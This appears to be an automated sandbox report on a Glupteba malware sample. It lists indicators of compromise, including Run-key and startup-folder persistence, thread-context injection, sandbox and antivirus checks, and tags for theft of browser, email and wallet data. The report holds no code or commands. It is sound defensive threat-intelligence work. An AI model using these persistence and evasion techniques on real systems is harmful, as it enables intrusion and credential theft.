glupteba | 97e95e99fd499ec45a7c1d8683d5731ce5e7a8fb8b710622e578cd169a00d8d9

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Kipuxesuve.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viqIqy.exe	explorer.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat	FE97.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\programs.bat:start	FE97.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\viqIqy.exe	explorer.exe

Loads dropped DLL 64 IoCs

pid	Process
3884	Install.tmp
4732	rundll32.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
3700	y1.exe
3700	y1.exe
3700	y1.exe
5368	toolspab1.exe
3700	y1.exe
3700	y1.exe
6044	c7ae36fa.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
5752	rundll32.exe
6132	rundll32.exe
6088	399.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
4760	SunLabsPlayer.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe
200	lighteningplayer-cache-gen.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Kaekaejushuce.exe\""	Ultra.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md1_1eaf.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
101	ip-api.com
130	api.myip.com
131	api.myip.com

Drops file in System32 directory 10 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\Q655CLWU.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\Q655CLWU.cookie	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 6705BDFA0597CA03	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 3C5A844E41C681C8	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy	rundll32.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	rundll32.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\aGDncOmoe	svchost.exe
File opened for modification	C:\Windows\System32\GroupPolicy\gpt.ini	rundll32.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	rundll32.exe

Suspicious use of SetThreadContext 9 IoCs

description	pid	Process	procid_target
PID 1048 set thread context of 4132	1048	svchost.exe	101
PID 5760 set thread context of 5368	5760	toolspab1.exe	123
PID 5976 set thread context of 4764	5976	F704.exe	185
PID 4908 set thread context of 1328	4908	18CA.exe	191
PID 6104 set thread context of 5840	6104	54B5.tmp.exe	213
PID 5988 set thread context of 4552	5988	EFFE.exe	219
PID 5604 set thread context of 5320	5604	euacjsh	222
PID 1816 set thread context of 1700	1816	euacjsh	227
PID 5668 set thread context of 5944	5668	euacjsh	231

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\install.dll	google-game.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\bbc_co_uk.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\data.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\vlm_export.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\temp_files\bckf.fon	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\aGDncOmoe\cache.dat	powershell.exe
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\mobile.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsdp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\offset_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libimage_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files\temp_files\aGDncOmoe.dll	data_load.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\2	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4audio_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1148	2592	WerFault.exe	172

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral11/files/0x000100000001ac0e-243.dat	nsis_installer_2
behavioral11/files/0x000100000001ac0e-244.dat	nsis_installer_2

Checks SCSI registry key(s) 3 TTPs 24 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7ae36fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	hdacjsh
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euacjsh

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
6008	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
5612	bitsadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2704	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time"	app.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0"	MicrosoftEdge.exe
